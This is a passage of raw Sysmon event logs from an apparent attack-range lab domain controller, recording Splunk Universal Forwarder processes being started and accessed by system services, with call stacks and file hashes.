Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.103{7901BC46-556A-6008-E606-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-556B-6008-E806-00000000A301}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-556B-6008-E806-00000000A301}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.679{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-556B-6008-E806-00000000A301}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.680{7901BC46-556B-6008-E806-00000000A301}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.164{7901BC46-556B-6008-E706-00000000A301}37167320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-556B-6008-E706-00000000A301}3716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-556B-6008-E706-00000000A301}3716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-556B-6008-E706-00000000A301}3716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:11.008{7901BC46-556B-6008-E706-00000000A301}3716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A3-6008-EA06-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55A3-6008-EA06-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.959{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A3-6008-EA06-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.960{7901BC46-55A3-6008-EA06-00000000A301}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.287{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A3-6008-E906-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.287{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 